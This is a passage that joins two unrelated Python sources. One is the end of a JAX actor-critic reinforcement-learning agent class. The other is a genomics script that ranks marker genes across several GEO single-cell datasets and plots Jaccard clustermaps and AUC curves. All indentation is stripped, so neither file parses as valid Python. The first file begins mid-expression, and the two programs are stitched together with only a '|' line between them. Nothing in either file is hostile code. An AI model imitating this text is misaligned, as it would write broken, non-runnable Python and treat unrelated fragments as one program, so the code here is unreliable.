lambda x, y: x * (1 - soft_target_tau) + y * soft_target_tau,
state.target_policy_params,
policy_params,
)
new_state = TrainingState(
policy_optimizer_state=policy_optimizer_state,
policy_params=policy_params,
target_policy_params=new_target_policy_params,
q_optimizer_state=q_optimizer_state,
q_params=q_params,
target_q_params=new_target_q_params,
key=key,
steps=state.steps + 1,
)
metrics = {}
return new_state, metrics
self.update_step = jax.jit(update_step, backend=self.backend)
def select_action_probabilistic(observation, policy_params, key_):
pre_action = self.policy_model.apply(policy_params, observation)
pre_action = self.postprocess(pre_action)
expl_noise = 0.1
return jnp.clip(
pre_action
+ expl_noise * jax.random.normal(key_, shape=pre_action.shape),
-1.0,
1.0,
)
def select_action_deterministic(observation, policy_params, key_=None):
pre_action = self.policy_model.apply(policy_params, observation)
return self.postprocess(pre_action)
self.select_action_probabilistic = jax.jit(
select_action_probabilistic, backend=self.backend
)
self.select_action_deterministic = jax.jit(
select_action_deterministic, backend=self.backend
)
def q_value(observation, action, q_params):
q_action = self.value_model.apply(q_params, observation, action)
min_q = jnp.min(q_action, axis=-1)
return min_q
self.q_value = jax.jit(q_value, backend=self.backend)
self.training_state = TrainingState(
policy_optimizer_state=self.policy_optimizer_state,
policy_params=self.policy_params,
target_policy_params=self.policy_params,
q_optimizer_state=self.q_optimizer_state,
q_params=self.q_params,
target_q_params=self.q_params,
key=local_key,
steps=jnp.zeros((1,)),
)
def value(self, observation, action):
return self.q_value(
observation,
action,
self.training_state.q_params,
)
def select_action(self, observation, eval_mode=False):
self.key, key_sample = jax.random.split(self.key)
if eval_mode:
apply_func = self.select_action_deterministic
else:
apply_func = self.select_action_probabilistic
action = apply_func(observation, self.training_state.policy_params, key_sample)
if len(action.shape) == 1:
return jnp.expand_dims(action, axis=0)
else:
return action
def save(self, directory):
os.makedirs(directory, exist_ok=True)
for filename in self.training_state.__dict__.keys():
with open(os.path.join(directory, filename + ".joblib"), "wb") as f_:
joblib.dump(self.training_state.__dict__[filename], f_)
def load(self, directory):
load_all = {}
for filename in self.training_state.__dict__.keys():
load_all[filename] = jax.tree_util.tree_multimap(
jnp.array, joblib.load(os.path.join(directory, filename + ".joblib"))
)
self.training_state = TrainingState(
policy_optimizer_state=load_all["policy_optimizer_state"],
policy_params=load_all["policy_params"],
target_policy_params=load_all["target_policy_params"],
q_optimizer_state=load_all["q_optimizer_state"],
q_params=load_all["q_params"],
target_q_params=load_all["target_q_params"],
key=load_all["key"],
steps=load_all["steps"],
)
def write_config(self, output_file: str):
print(self._config_string, file=output_file)
def train_on_batch(self, batch):
observations = batch["observation"]
actions = batch["action"]
rewards = batch["reward"]
new_observations = batch["next_observation"]
mask = 1 - batch["done"] * (1 - batch["truncation"])
self.training_state, metrics = self.update_step(
self.training_state, observations, actions, rewards, new_observations, mask
)
return metrics
|
#!/usr/bin/env python
import pandas as pd
import datetime
from scipy import sparse
import scipy.io
from scipy.stats import zscore, wilcoxon, spearmanr
from sklearn.preprocessing import binarize, normalize
from sklearn import metrics
from itertools import cycle
import os
import pickle
import seaborn as sns
import subprocess
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import sys
import re
import math
import datetime
from scipy.spatial import distance
from scipy.cluster import hierarchy
import scanpy as sc
from itertools import combinations
from functools import reduce
from scipy.cluster.hierarchy import linkage
import scipy.spatial.distance as ssd
from matplotlib import cm
GENE_SIZES = [10, 50, 100, 200, 500, 1000]
SET = 5
MSHAPES = ['o', 'P', 's', 's', '.', '^', '^', '^', '^', '^', '^']
USHAPES = ['o', 'P', 's', 's', '.', 'v', '^', '>', '<', 'D', 'd']
ALL_DATA = True
SCANPY_OBJS = {'gene': ['GSE100033_gene_id_order_gene__all_bin_scanpy_obj_with_feat.pyn', 'GSE111586_gene_id_order_gene__all_scanpy_obj.pyn', 'GSE123576_gene_id_order_gene__all_scanpy_obj.pyn', 'GSE126074_gene_id_order_gene__all_scanpy_obj.pyn', 'GSE127257_distal_id_gene_order__all_scanpy_obj.pyn', 'GSE1303990_gene_id_order_gene__all_scanpy_obj.pyn', 'BICCN2_gene_id_order_gene__all_scanpy_obj.pyn'],
'distal': ['GSE100033_distal_id_order_distal__all_bin_scanpy_obj_with_feat.pyn', 'GSE111586_distal_id_order_distal__all_scanpy_obj.pyn', 'GSE123576_distal_id_order_distal__all_scanpy_obj.pyn', 'GSE126074_distal_id_order_distal__all_scanpy_obj.pyn', 'GSE127257_distal_id_gene_order__all_scanpy_obj.pyn', 'GSE1303990_distal_id_order_distal__all_scanpy_obj.pyn', 'BICCN2_distal_id_order_distal__all_scanpy_obj.pyn'],
'proximal': ['GSE100033_proximal_id_proximal__all_bin_scanpy_obj_with_feat.pyn', 'GSE111586_proximal_id_order_proximal__all_scanpy_obj.pyn', 'GSE123576_proximal_id_order_proximal__all_scanpy_obj.pyn', 'GSE126074_proximal_id_order_proximal__all_scanpy_obj.pyn', 'GSE127257_distal_id_gene_order__all_scanpy_obj.pyn', 'GSE1303990_proximal_id_order_proximal__all_scanpy_obj.pyn', 'BICCN2_proximal_id_order_proximal__all_scanpy_obj.pyn']}
GSES = ['GSE100033', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303990']
if not ALL_DATA:
GSES = GSES[0:-1]
MSHAPES = MSHAPES[0:-1]
USHAPES = USHAPES[0:-1]
PMARKER = ['SF', 'CU', 'TA', 'TN', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257']
AMARKER = ['SF', 'CU', 'TA', 'TN', 'SC', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257']
else:
PMARKER = ['SF', 'CU', 'TA', 'TN', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303990']
AMARKER = ['SF', 'CU', 'TA', 'TN', 'SC', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303990']
def get_palette_shape(size, data=False):
global ALL_DATA
print(size)
if data:
if ALL_DATA:
palette = ['#E64B35FF'] + sns.color_palette('Greys', 6)[::-1]
shape = ['-', '--', '--', '--', '--', '--', '--']
else:
palette = ['#E64B35FF'] + sns.color_palette('Greys', 5)[::-1]
shape = ['-', '--', '--', '--', '--', '--']
else:
if ALL_DATA:
if size == 11:
palette = ['#E64B35FF', '#4DBBD5FF', '#00A087FF', '#91D1C2FF', '#3C5488FF'] + sns.color_palette('Greys', 6)[::-1]
shape = ['-', '-', '-', '-', '-', '--', '--', '--', '--', '--', '--']
else:
palette = ['#E64B35FF', '#4DBBD5FF', '#00A087FF', '#91D1C2FF'] + sns.color_palette('Greys', 6)[::-1]
shape = ['-', '-', '-', '-', '--', '--', '--', '--', '--', '--']
else:
assert size <= 10
if size == 10:
palette = ['#E64B35FF', '#4DBBD5FF', '#00A087FF', '#91D1C2FF', '#3C5488FF'] + sns.color_palette('Greys', 5)[::-1]
shape = ['-', '-', '-', '-', '-', '--', '--', '--', '--', '--']
else:
palette = ['#E64B35FF', '#4DBBD5FF', '#00A087FF', '#91D1C2FF'] + sns.color_palette('Greys', 5)[::-1]
shape = ['-', '-', '-', '-', '--', '--', '--', '--', '--']
return palette, shape
def norm_row_columns(X):
from sklearn.preprocessing import MinMaxScaler
X = np.array(X)
print(X.shape)
scaler = MinMaxScaler()
X = np.apply_along_axis(lambda x: MinMaxScaler().fit_transform(x.reshape(-1, 1)), 0, X)
X = np.squeeze(X)
X = np.apply_along_axis(lambda x: MinMaxScaler().fit_transform(x.reshape(-1, 1)), 1, X)
X = np.squeeze(X)
print(X.shape)
# X = normalize(X, norm='l2', axis=0)
# X = normalize(X, norm='l2', axis=1)
return X
def get_celltype_category(sample_types):
# order 'celltype'
if 'AC' in sample_types:
sample_uniq = ['AC', 'EX', 'IN', 'MG', 'OG', 'OT']
elif 'NN' in sample_types:
sample_uniq = ['NN', 'EX', 'IN']
else:
sample_uniq = ['OT', 'EX', 'IN', 'MG', 'OG']
sample_uniq = [x for x in sample_uniq if x in sample_types]
return [str(sample_uniq.index(x))+'_'+x if x in sample_uniq else str(len(sample_uniq))+'_NA' for x in sample_types]
def plot_seaborn_barplot(df, x, y, hue, output, kwargs):
df = df.sort_values(hue)
print(df)
print(x, y, hue)
ax = sns.catplot(x=x, data=df, y=y, col=hue, kind='bar', **kwargs)
ax.savefig(output, bbox_inches='tight')
plt.close('all')
plt.clf()
def plot_seaborn_scatter(data, x, y, hue, out, kwargs, annot=False, scatter=True, asc=True, sort=True):
global AMARKER
if sort:
data = data.sort_values(hue, ascending=asc)
print(kwargs)
for mset in ['', 'data', 'marker']:
oname = out.replace('.p', mset+'.p')
if mset == 'marker':
df = data.loc[data[hue].isin(AMARKER[0:5]),:]
elif mset == 'data':
df = data.loc[~data[hue].isin(AMARKER[1:5]),:]
else:
df = data
if scatter:
ax = sns.scatterplot(x=x, y=y, data=df, hue=hue, **kwargs)
else:
ax = sns.lineplot(x=x, y=y, data=df, hue=hue, **kwargs)
ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
if annot:
for line in range(0, df.shape[0]):
ax.text(df.iloc[line,:][x], df.iloc[line,:][y], str(line), horizontalalignment='left', size='small', color='black')
fig = ax.get_figure()
fig.savefig(oname, bbox_inches='tight')
plt.close()
plt.clf()
def plot_specific_markers(path, out, x="Gad2", y="Slc17a7", hue="cluster"):
with open(path, "rb") as f:
adata=pickle.load(f)
print(adata.obs.columns)
if x not in adata.var.index or y not in adata.var.index:
return
df = pd.DataFrame({x:adata[:,x].X, y:adata[:,y].X, hue:adata.obs.loc[:,hue]})
print(df.iloc[0,:].loc[hue])
if str(df.iloc[0,:].loc[hue]).replace(".", '').isdigit():
max_digit = np.log10(max(df.loc[:,hue].values))
df.loc[:,hue] = ['cluster_'+str(x).zfill(np.ceil(max_digit).astype(int)) for x in df.loc[:,hue]]
print(df)
a = df.groupby(hue).mean()
plot_seaborn_scatter(a.reset_index(), x, y, hue, out, {}, True)
def read_marker_gene(fname):
with open(fname) as f:
return [line.rstrip('\n').split(' ')[0].strip('\"') for line in f.readlines() if len(line) > 0 and line[0] != "#"]
# def plot_specific_features(path, out, marker_file="", order=False, marker=False):
# with open(path, "rb") as f:
# adata=pickle.load(f)
# names = read_marker_gene(marker_file)
# rank, index = zip(*[[i, x] for i, x in enumerate(names) if x in adata.var.index])
# df = adata[:,list(index)].X
# if sparse.issparse(df):
# df = df.todense()
# df = pd.DataFrame(df)
# df.columns = adata[:,list(index)].var.index
# digit = np.ceil(np.log10(df.shape[1])).astype(int)
# gene_list = dict([(i, x) for i, x in enumerate(df.columns)])
# #df.columns = [str(i).zfill(digit) +"_"+x for i, x in enumerate(df.columns)]
# # if df.shape[1] > 50:
# df.columns = [i for i in range(len(df.columns))]
# mheader = os.path.basename(marker_file).split('.')[0]
# for cluster in ['celltype']:
# if cluster not in adata.obs.columns: continue
# print(cluster)
# df.loc[:,'cluster'] = adata.obs.loc[:,cluster].values
# mdf = df.loc[~pd.isnull(df.loc[:,'cluster']),:]
# mdf = mdf.loc[mdf.loc[:,'cluster'] != "Mis",:] # Remove nan and miscs
# mdf = mdf.loc[~mdf.loc[:,'cluster'].endswith('_NA'),:] # Remove nan and miscs
# mdf.loc[:,'cluster'] = ['0_OT' if x.split('_')[1] in ['AC', 'OG', 'MG', 'OT'] else x for x in mdf.loc[:,'cluster'].values]
# mdf = mdf.groupby('cluster').mean().reset_index()
# mdf = mdf.melt(id_vars=['cluster'])
# #mdf.loc[:,'cluster'] = [clusters.index(x) for x in mdf.loc[:,'cluster']]
# mdf.loc[:,'cluster'] = mdf.loc[:,'cluster'].astype('category')
# print(mdf)
# ax = sns.lineplot(x="variable", y="value", data=mdf, hue='cluster', palette='Set2', alpha=0.5)
# ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
# fig = ax.get_figure()
# opath = os.path.join("contribut_"+out+"_"+mheader+"_"+cluster+'.png')
# fig.savefig(opath, bbox_inches='tight')
# plt.close()
# plt.clf()
# mdf = mdf[mdf.loc[:,'variable'] <= 40]
# max_index = mdf.loc[:,'variable'].max()
# mdf.loc[:,'variable'] = [gene_list[x] for x in mdf.loc[:,'variable']]
# print(mdf)
# print(mdf.loc[mdf.loc[:,'variable'].duplicated(),'variable'])
# mdf.loc[:,'variable'] = mdf.loc[:,'variable'].astype(pd.api.types.CategoricalDtype(categories = mdf.loc[~mdf.loc[:,'variable'].duplicated(), 'variable'].values))
# print(mdf)
# #.astype('category')
# if marker:
# ax = sns.lineplot(x="variable", y="value", data=mdf, hue='cluster', palette='Set2', alpha=0.5, marker='.')
# else:
# ax = sns.lineplot(x="variable", y="value", data=mdf, hue='cluster', palette='Set2', alpha=0.5)
# print(ax.get_xticklabels())
# #ax.set_xticklabels(ax.get_xticklabels(), rotation=30)
# for label in ax.get_xticklabels():
# label.set_rotation(90)
# ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
# fig = ax.get_figure()
# opath = os.path.join("contribut_"+out+"_"+mheader+"_"+cluster+'_top.png')
# fig.savefig(opath, bbox_inches='tight')
# plt.close()
# plt.clf()
# def compare_rank_with_variance(head, input):
# df = pd.read_csv("/data/rkawaguc/data/190905_mouse_immune/1-s2.0-S0092867418316507-mmc3_var_ratio_lu.csv")
# idf = pd.read_csv(input, index_col=0)
# idf = idf.reset_index().melt(id_vars='index')
# m = idf.merge(df, left_on='value', right_on="GeneID", how='left')
# m = m.loc[~m.loc[:,'variable'].endswith('_NA'),:]
# m = m.loc[~pd.isnull(m.loc[:,'GeneID']),:]
# # print(m)
# # print(list(set(m.loc[:,'variable'].values)))
# for c in df.columns:
# if c == 'GeneID': continue
# print(c)
# plot_seaborn_scatter(m.loc[m.loc[:,'index'] < 1000, :], 'index', c, 'variable', head+'_'+c+'_1000', {'alpha':0.3, 'linewidth':0})
# p = m.loc[:,['index', 'variable', c]]
# #p = p.loc[~pd.isnull(p.loc[:,c]),:]
# print('???', p)
# p = p.groupby('variable').rolling(window=500, min_periods=250).mean()
# print('1st', p)
# p.columns = [x if x != 'index' else 'mindex' for x in p.columns]
# p = p.loc[:,[x for x in p.columns if x != 'variable']]
# print('before', p)
# p = p.reset_index()
# print('after', p)
# plot_seaborn_scatter(p, 'mindex', c, 'variable', head+'_'+c, {'alpha':0.8}, scatter=False)
# for u in m.loc[:,'variable'].unique():
# try:
# print(m.loc[m.loc[:,'variable'] == u, c].iloc[0:10,])
# print(c, u, wilcoxon(m.loc[m.loc[:,'variable'] == u, c], alternative=''))
# except:
# pass
def add_celltype_category(sample_types):
number_added = False
if len(sample_types[0].split('_')) >= 2:
number_added = True
print(number_added, sample_types)
if number_added:
sample_real_uniq = sorted(list(set([x.split('_')[1] for x in sample_types])))
else:
sample_real_uniq = sorted(list(set(sample_types)))
if len([x for x in sample_real_uniq if x != 'NA']) <= 3 and 'NN' not in sample_real_uniq:
sample_dict = dict([(x, x) if x in ['IN', 'EX'] else (x, 'NN') for x in sample_real_uniq])
sample_types = [sample_dict[x] for x in sample_types]
if 'AC' in sample_real_uniq:
sample_uniq = ['AC', 'EX', 'IN', 'MG', 'OG', 'OT']
elif len([x for x in sample_real_uniq if x != 'NA']) <= 3:
sample_uniq = ['NN', 'EX', 'IN']
elif 'OT' in sample_real_uniq:
sample_uniq = ['OT', 'EX', 'IN', 'MG', 'OG']
else:
sample_uniq = ['NN', 'EX', 'IN']
if number_added:
sample_types_wo_num = [x.split('_') for x in sample_types]
sample_types_wo_num = ['_'.join(x[1:len(x)]) for x in sample_types_wo_num]
return [ sample_types[i] if x in sample_uniq else str(len(sample_real_uniq)-1)+'_NA' for i, x in enumerate(sample_types_wo_num)]
else:
return [str(sample_uniq.index(x))+'_'+x if x in sample_uniq else str(len(sample_uniq))+'_NA' for x in sample_types]
def compare_rank_across_datasets(marker_list):
global ALL_DATA
#dir_rank = 'rank_list'
dir_rank = './'
for tag in ['celltype', 'icluster']:
clust = ('cluster' if tag == 'icluster' else tag)
data = None
headers = ["BICCN2_gene_"+clust, "GSE111586_gene_"+clust, \
"GSE123576_gene_"+clust,\
"GSE126074_gene_"+clust, "GSE127257_gene_"+clust]
if tag == 'icluster':
inputs = ["BICCN2_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
"GSE111586_gene_id_order_gene__all_rank_genes_"+'Ident'+".csv", \
"GSE123576_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
"GSE126074_gene_id_order_gene__all_rank_genes_"+'Ident'+".csv", \
"GSE127257_distal_id_gene_order__all_rank_genes_"+clust+".csv"]
else:
inputs = ["BICCN2_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
"GSE111586_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
"GSE123576_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
"GSE126074_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
"GSE127257_distal_id_gene_order__all_rank_genes_"+clust+".csv"]
if ALL_DATA:
headers.extend(["GSE1303990_gene_"+clust])
inputs.extend(["GSE1303990_gene_id_order_gene__all_rank_genes_"+clust+'.csv'])
if clust == 'cluster':
headers.extend(["GSE100033_gene_"+clust])
inputs.extend(["GSE100033_gene_id_order_gene__all_rank_genes_"+clust+".csv"])
for i, (head, input) in enumerate(zip(headers, inputs)):
print(head, input)
df = pd.read_csv(os.path.join(dir_rank, input), index_col=0)
if clust == 'celltype':
df.columns = add_celltype_category(df.columns)
print(df.head())
df = df.loc[:,[c for c in df.columns if '_NA' not in c]] # Remove Nan and miscs
df.columns = [head+'_'+str(c) for c in df.columns]
if data is None:
data = df
else:
data = pd.concat([data, df], axis=1)
print(data)
data.to_csv('rank_gene_list_'+tag+'.csv')
def read_markers(fname):
if 'fc.txt' in fname:
df = pd.read_csv(fname, header=0, comment='#', sep=" ")
print(df.head())
return df.iloc[:,0]
else:
with open(fname) as f:
return pd.Series([line.rstrip('\n') for line in f.readlines() if len(line) > 0 and line[0] != '#'])
def test_raw_expression(scobj, raw_file):
pass
def compute_intersect(u, v):
int_c = len(set(u).intersection(set(v)))
return int_c
def compute_jaccard(u, v):
int_c = len(set(u).intersection(set(v)))
if len(u)+len(v)-int_c == int_c: return 1.
return int_c/(len(u)+len(v)-int_c)
def set_marker_color(sample_types, palette_name, ref=None, others='0_NN', max_s=None):
print(sample_types)
if ref is None:
from collections import OrderedDict
sample_uniq = OrderedDict((x, True) for x in sample_types).keys()
else:
sample_uniq = ref
print(ref)
if max_s is None:
print(sample_uniq)
max_s = len(sample_uniq)
assert max_s >= len(sample_uniq)
sample_dict = dict([(sam, col) if 'NA' not in sam else (sam, (0.3, 0.3, 0.35)) for sam, col in zip(sample_uniq, sns.color_palette(palette_name, max_s)[::-1])])
print(sample_dict)
return [sample_dict[c] if c in sample_dict else sample_dict[others] for c in sample_types]
def read_cluster_assignment(icluster=False, pad=False):
dir = "/data/rkawaguc/data/191003_BICCN_sf_marker_more/cluster_annotation/"
dict = {}
for root, dirs, files in os.walk(dir):
for fname in files:
if not fname.endswith('.csv') or 'auto' in fname:
continue
gse_number = fname.split('_')[0]
if gse_number in ['GSE126074', 'GSE111586']:
if icluster and '_cluster' in fname: continue
if (not icluster) and 'icluster' in fname: continue
df = pd.read_csv(os.path.join(dir, fname))
for index, row in df.iterrows():
value = row['celltype']
if pd.isnull(value): value = 'NA'
if (gse_number in ['GSE126074', 'GSE111586']) and icluster:
dict[gse_number+'_gene_cluster_'+str(row['cluster'])] = value
elif pad:
dict[gse_number+'_gene_cluster_'+str(str(int(row['cluster'])).zfill(np.ceil(2).astype(int)))] = value
else:
dict[gse_number+'_gene_cluster_'+str(int(row['cluster']))] = value
print('cluster_dict', dict.keys())
return dict
def comp_jaccard_gene_list(rank_file_list, marker_file_list, header, annotated=True):
global AMARKER, SET
print('comp_jaccard_gene_list')
data = None
for fname in rank_file_list:
df = pd.read_csv(fname, index_col=0)
if data is None: data = df
else: data = pd.concat([data, df], axis=1)
if annotated:
dict = None
else:
dict = read_cluster_assignment(icluster=('icluster' in header))
plot_cluster(data.iloc[0:100,:], header, '_data_100', annotated=dict)
plot_cluster(data.iloc[0:1000,:], header, '_data_1000', annotated=dict)
marker = None
for fname in marker_file_list:
df = pd.read_csv(fname, index_col=0)
if marker is None: marker = df
else: marker = pd.concat([marker, df], axis=1)
col_dict = {}
for m in ['SF', 'SC', 'CU', 'TA', 'TN', 'SM']:
temp = marker.loc[:,marker.columns.str.contains(pat=m)]
(col_ind, col_colors), score_mat = plot_cluster_against_marker(temp.iloc[0:100,:], data.iloc[0:100,:], header, '_'+m+'_100', annotated=dict)
col_dict[m+'_100'] = [col_ind, col_colors, score_mat]
(col_ind, col_colors), score_mat = plot_cluster_against_marker(temp.iloc[0:100,:], data.iloc[0:1000,:], header, '_'+m+'_1000', annotated=dict)
col_dict[m+'_1000'] = [col_ind, col_colors, score_mat]
# SM for the IN or EX clusters in each marker set
if 'cluster' not in header:
return
sm_marker = marker.iloc[0:100,:].loc[:,marker.columns.str.contains(pat='SM')]
for m in AMARKER[0:SET]:
for gene_size in [100, 1000]:
col_ind, col_colors, score_mat = col_dict[m+'_'+str(gene_size)]
Y_pred_bin = get_max_indices(score_mat)
for i, c in enumerate(['IN', 'EX']):
df = data.iloc[0:gene_size,:]
y_pred = Y_pred_bin[i,:]
selected_marker = [sc for sc in sm_marker.columns if c in sc]
print(selected_marker, sm_marker)
selected_order = [j for j in col_ind if y_pred[j] == 1]
selected_color = [col_colors[h] for h, j in enumerate(col_ind) if y_pred[j] == 1]
sm_pred = np.array([[compute_jaccard(sm_marker.loc[:,sc], df.iloc[:,j]) for j in selected_order] for sc in selected_marker])
sm_pred = norm_row_columns(np.array(sm_pred))
plot_cluster_against_marker_dist(selected_marker, df.iloc[:,selected_order].columns, sm_pred, header, '_'+m+'_'+str(gene_size)+'_sm_norm_'+c, dict, [selected_color])
def convert_sample_to_label(samples, annotated, problem=''):
if annotated is None:
labels = ['1_EX' if 'EX' in c else '2_IN' if 'IN' in c else '3_NA' if 'NA' in c else '0_NN' for c in samples]
else:
samples = [annotated[c] if c in annotated else '3_NA' for c in samples]
labels = ['1_EX' if 'EX' in c else '2_IN' if 'IN' in c else '3_NA' if 'NA' in c else '0_NN' for c in samples]
if problem != '':
if 'neuron' in problem:
labels = ['0_N' if 'NN' in c else '1_P' if 'EX' in c or 'IN' in c else '3_NA' for c in labels]
else:
labels = ['1_EX' if 'EX' in c else '2_IN' if 'IN' in c else '3_NA' for c in labels]
return labels
def plot_cluster(data, header, tail, annotated):
global ALL_DATA
viridis = cm.get_cmap('viridis', 15)
dist = [[0 if j == c else 1.-compute_jaccard(data.loc[:,c], data.loc[:,j]) for j in data.columns] for c in data.columns]
print(dist)
dist = np.nan_to_num(np.array(dist), 1)
pdist = ssd.squareform(dist)
z = linkage(pdist)
sample_types = [c.split('_')[0] for c in data.columns]
row_colors = [set_marker_color(sample_types, 'Greys', max_s=(6 if not ALL_DATA else 7))]
sample_types = convert_sample_to_label(data.columns, annotated)
print(sample_types)
if '3_NA' in sample_types:
row_colors.append(set_marker_color(sample_types, 'Set2', ['3_NA', '0_NN', '1_EX', '2_IN']))
else:
row_colors.append(set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN']))
col_colors = row_colors
for i in range(len(dist)):
dist[i][i] = 1
for i in range(len(dist)):
dist[i][i] = np.matrix(dist).min()
dist = pd.DataFrame(1.-np.array(dist))
dist.index = data.columns
dist.columns = data.columns
g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_linkage=z, row_linkage=z)
g.savefig("cluster_"+header+tail+"_clustered.pdf")
g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_cluster=False, row_cluster=False)
g.savefig("cluster_"+header+tail+"_original.pdf")
def plot_cluster_against_marker(marker, data, header, tail, annotated, col_colors=None):
import scipy.spatial.distance as ssd
dist = [[compute_jaccard(marker.loc[:,c], data.loc[:,j]) for j in data.columns] for c in marker.columns]
print(data.columns, marker.columns)
print(header, tail)
_, _ = plot_cluster_against_marker_dist(marker.columns, data.columns, dist, header, tail, annotated, col_colors)
dist = norm_row_columns(np.array(dist))
Y_pred = np.array([[compute_jaccard(marker.loc[:,c], data.loc[:,j]) for j in data.columns] for c in marker.columns])
return plot_cluster_against_marker_dist(marker.columns, data.columns, dist, header+'_norm', tail, annotated, col_colors), Y_pred
def plot_cluster_against_marker_dist(marker_names, data_names, dist, header, tail, annotated, col_colors=None):
global ALL_DATA
import scipy.spatial.distance as ssd
from matplotlib import cm
viridis = cm.get_cmap('viridis', 15)
print(data_names, marker_names)
tdist = pd.DataFrame(dist).corr()
tdist = tdist.fillna(0)
print(tdist)
tdist = -1*np.clip(tdist, a_min=0, a_max=1)+1
np.fill_diagonal(tdist.values, 0)
pdist = ssd.squareform(tdist)
z = linkage(pdist)
sample_types = [c.split('_')[0] for c in data_names]
if col_colors is None:
col_colors = [set_marker_color(sample_types, 'Greys', max_s=(6 if not ALL_DATA else 7))]
sample_types = convert_sample_to_label(data_names, annotated)
#print(sample_types)
if '3_NA' in sample_types:
col_colors.append(set_marker_color(sample_types, 'Set2', ['3_NA', '0_NN', '1_EX', '2_IN']))
else:
col_colors.append(set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN']))
print(col_colors)
row_colors = set_marker_color([x.split('_')[1] for x in marker_names], 'Set2', ['NN', 'EX', 'IN'], others='NN')
dist = pd.DataFrame(dist)
dist.index = marker_names
dist.columns = data_names
g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_linkage=z, row_cluster=False, xticklabels=True)
col_ind = g.dendrogram_col.reordered_ind
g.savefig("cluster_"+header+tail+"_clustered.pdf")
g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_cluster=False, row_cluster=False, xticklabels=True)
g.savefig("cluster_"+header+tail+"_original.pdf")
if len(col_colors) == 2:
return col_ind, [col_colors[0][c] for c in col_ind]
else:
return col_ind, [col_colors[c] for c in col_ind]
def plot_aggregated_cluster_mean(mdirs, mfiles, files, cluster):
if cluster in ['cluster', 'icluster']:
dict = read_cluster_assignment(pad=True)
else:
dict = None
for i, (mdir, mflist) in enumerate(zip(mdirs, mfiles)):
print(mdir, mflist)
for j, mfile in enumerate(mflist):
if j%3 != 2: continue
for method in ['rankmean', 'average']:
for reg_type in ['reg', 'reg_mean'][1:]:
for mind in range(0, 3):
all = None
for fhead in files:
if ('GSE126074' in fhead or 'GSE111586' in fhead) and cluster == 'icluster':
chead = 'Ident'
else:
chead = ('cluster' if cluster == 'icluster' else cluster)
csv_dir = fhead.split('_')[0]
if 'GSE' in csv_dir:
csv_dir = csv_dir[0:6]
fname = os.path.join("./figures/", fhead+method+'_'+mfile.split('.')[0]+'_'+chead+'_'+str(mind)+'_'+reg_type+'.csv')
print(fname)
if not os.path.exists(fname):
fname = os.path.join("./figures/", csv_dir, fhead+method+'_'+mfile.split('.')[0]+'_'+chead+'_'+str(mind)+'_'+reg_type+'.csv')
print('second trial', fname)
if not os.path.exists(fname):
continue
print(fname)
df = pd.read_csv(fname)
gse_number = fhead.split('_')[0]
df.loc[:,'batch'] = gse_number
if cluster in ['cluster', 'icluster']:
df.loc[:,'celltype'] = [dict[gse_number+'_gene_'+row['cluster']] for i,row in df.iterrows()]
all = pd.concat((all, df))
print(fhead, all.shape)
print('end')
print(all)
kwargs = ({'alpha':0.1, 'linewidth':0} if reg_type == 'reg' else {'alpha':0.8})
kwargs['style'] = 'batch'
out = 'agg_signal_'+mfile+'_'+method+'_'+reg_type+'_'+str(mind)+'_'+cluster+'.png'
all = all.loc[~all.loc[:,'celltype'].str.endswith('NA'),:]
plot_seaborn_scatter(all, all.columns[2], all.columns[3], 'celltype', out=out, kwargs=kwargs)
def draw_auc_selected(file_list, header_list, output, palette=None, dir='./'):
global AMARKER
if palette is None:
palette, shape = get_palette_shape(len(AMARKER))
col_dict = dict([(h, palette[AMARKER.index(h)]) for i, h in enumerate(header_list)])
for key in ['1_EX', '2_IN', '0_NN']:
fptpr = {}
for header, fname in zip(header_list[::-1], file_list[::-1]):
with open(os.path.join(dir, fname), 'rb') as f:
df = pickle.load(f)
if key in df:
fptpr[header] = df[key]
plot_auc_result(fptpr, output+'_'+key.split('_')[1]+'_auc.pdf', col_dict, shape[::-1])
def draw_auc_selected_each(file_list, header_list, output, palette=None, dir='./', marker=None, data=False):
global AMARKER
if marker is None:
marker = AMARKER
if palette is None:
palette, shape = get_palette_shape(len(marker), data=data)
# for i in range(len(header_list)):
# print(header_list[i], file_list[i])
print(marker, header_list)
col_dict = dict([(h, palette[marker.index(h)]) for i, h in enumerate(header_list)])
print(col_dict)
fptpr = {}
for header, fname in zip(header_list[::-1], file_list[::-1]):
with open(os.path.join(dir, fname), 'rb') as f:
df = pickle.load(f)
fptpr[header] = df
plot_auc_result(fptpr, output+'_auc.pdf', col_dict, shape[0:len(marker)][::-1])
def plot_scatter_performance(df, y, header):
global AMARKER, MSHAPES
print(get_palette_shape(df.loc[df.loc[:,'celltype'].str.endswith('IN'),:].shape[0]))
palette, _ = get_palette_shape(df.loc[df.loc[:,'celltype'].str.endswith('IN'),:].shape[0])
df.index = df.marker
hue = df.columns[0]
print(df)
df = df.loc[:,[hue, y]]
print(df)
print(df.index[~df.index.duplicated()])
col_dict = dict([(h, palette[i]) for i, h in enumerate(df.index[~df.index.duplicated()])])
kwargs = {'palette':col_dict, 'edgecolor':'k'}
plot_seaborn_barplot(df.reset_index(), 'marker', y, 'celltype', header+'_bar.pdf', kwargs)
